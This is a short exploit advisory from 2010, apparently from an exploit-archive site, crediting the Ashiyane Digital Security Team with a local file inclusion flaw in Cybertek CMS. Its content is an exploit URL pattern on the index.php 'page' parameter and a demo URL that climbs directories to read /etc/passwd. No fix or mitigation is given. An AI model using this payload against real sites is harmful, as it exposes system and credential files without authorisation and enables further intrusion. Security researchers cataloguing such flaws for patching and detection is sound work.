Cybertek CMS Local File Inclusion Vulnerability

2010-05-16 09:04:01

=======================================================
Cybertek CMS Local File Include Vulnerability
=======================================================
########################################
# Name: Cybertek CMS Local File Include Vulnerability
# Vendor: www.cybertek.co.za
# Date: 2010/05/16
# Author: Ashiyane Digital Security Team
# Discovered: XroGuE
# Thanks to: Virangar,Ali.Eagle,Satanic2000,Ashiyane Members
# Contact: [email protected]
########################################

########################################
[+] Vulnerability:

[+] Exploit: www.Site.com/[path]/index.php?page=[LFI]

[+] Demo: http://server/index.php?page=../../../../../../../../../../../etc/passwd


[+] Done ... ! :))

########################################

Fixes

No fixes

In order to submit a new fix you need to be registered.